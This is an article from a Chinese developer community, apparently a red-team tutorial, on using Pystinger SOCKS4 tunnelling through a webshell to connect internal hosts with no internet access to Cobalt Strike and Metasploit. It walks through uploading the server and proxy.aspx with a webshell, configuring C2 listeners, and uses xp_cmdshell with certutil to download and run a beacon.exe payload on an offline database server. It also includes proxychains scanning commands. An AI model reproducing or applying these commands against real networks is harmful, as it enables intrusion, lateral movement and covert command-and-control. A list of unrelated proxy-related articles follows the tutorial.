AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

利用Pystinger Socks4上线不出网主机

2023-09-29 163
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 利用Pystinger Socks4上线不出网主机

我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!


项目地址:https://github.com/FunnyWolf/pystinger


相关阅读:

1、利用MSF上线断网主机的思路分享

2、利用goproxy http上线不出网主机


0x01 测试环境

    攻击机(Kali):192.168.56.101
受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡
受害机2(Data):192.168.186.4 - 断网机


    0x02 Pystinger简单介绍

    Pystinger由服务端webshellstinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。


    webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。


    大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。


    0x03 Pystinger上线不出网主机

    我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。

      start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0


      注:作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。


      将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

        root@kali:/tmp# chmod 777 stinger_client
root@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000

        场景1:单主机上线

        已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020

        场景2:多主机上线

        已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020


        配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。

          EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'
EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'

          CobaltStrike监听设置

          • 单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020
          • 多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020
          • 注:目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;


          上线至MSF的利用姿势

          Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?

            root@kali:~# proxychains telnet 192.168.186.4 1433
root@kali:~# proxychains curl http://192.168.186.4
root@kali:~# proxychains nmap -sT -Pn 192.168.186.4
[...SNIP...]


            如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了...。

              root@kali:~# proxychains msfconsole -q
[...SNIP...]
              文章标签:
              网络协议
              Java
              PHP
              测试技术
              安全
              潇湘信安
              目录
              相关文章
              fensnote
              |
              10月前
              |
              网络协议
              tcp端口转发工具v2.0.2版本发布
              tcp端口转发工具v2.0.2版本发布
              fensnote
              302 0
              123hello123
              |
              Go
              socks5 搭建代理服务
              socks5 搭建代理服务
              123hello123
              619 0
              游客p6hzec5p3akpo
              socks5在服务器运行正常 但始络无法连接
              配置好socks5代理 服务器都运行正常 无法连接
              游客p6hzec5p3akpo
              978 0
              socks5在服务器运行正常 但始络无法连接
              爬虫工程师Azeroth
              |
              7月前
              |
              数据采集 NoSQL API
              自建使用隧道代理全教程,太难?阿布云快代理小象代理的隧道代理用谁的?
              在信息技术飞速发展的今天,通过部署隧道代理可增强网络通讯的安全性,并简化数据采集过程中的代理IP使用。本文将介绍如何部署隧道代理,包括选择付费代理IP、安装必要的库(如 requests)、搭建隧道并使用 Redis 管理代理IP,以及使用 OpenResty 实现代理IP的自动转发。此外,还推荐了青果网络提供的隧道代理服务及其优势。
              爬虫工程师Azeroth
              320 0
              阿文没烦恼
              |
              10月前
              |
              数据采集
              如何解决无法联网的IP代理问题
              如何解决无法联网的IP代理问题
              阿文没烦恼
              123 9
              石宗昊
              |
              9月前
              |
              网络协议 Linux Windows
              测试端口是否开放 tcp端口 udp端口 测试服务器端口连通性
              测试端口是否开放 tcp端口 udp端口 测试服务器端口连通性
              石宗昊
              159 0
              阿文没烦恼
              |
              10月前
              |
              监控 安全 网络安全
              代理IP安全问题:在国外使用代理IP是否安全
              代理IP安全问题:在国外使用代理IP是否安全
              阿文没烦恼
              147 3
              阿文没烦恼
              |
              10月前
              |
              网络安全
              设置ip代理无法联网怎么办
              设置ip代理无法联网怎么办
              阿文没烦恼
              149 2
              游客xusvbxsoy3qma
              |
              10月前
              |
              安全 网络安全 数据安全/隐私保护
              socks5代理如何工作?socks5代理可以用来做什么?
              本文介绍了socks5代理,一种能传输二进制数据的协议代理,提供更好的安全性和灵活性。它在客户端和服务器间作为中介,支持加密通信,适用于突破网络限制、保护隐私和加速访问。选择socks5代理应考虑稳定性、速度、安全性和透明性,以及对多协议的支持。
              游客xusvbxsoy3qma
              146 0
              爬虫工程师Azeroth
              |
              数据采集 大数据 Java
              9月青果网络代理IP测试,最新代理IP质量测试,有没有好的代理IP推荐?
              秉着对真相的探究,我购买青果网络HTTP代理进行测试供大家参考。那一起看看测试结果吧!
              爬虫工程师Azeroth
              418 1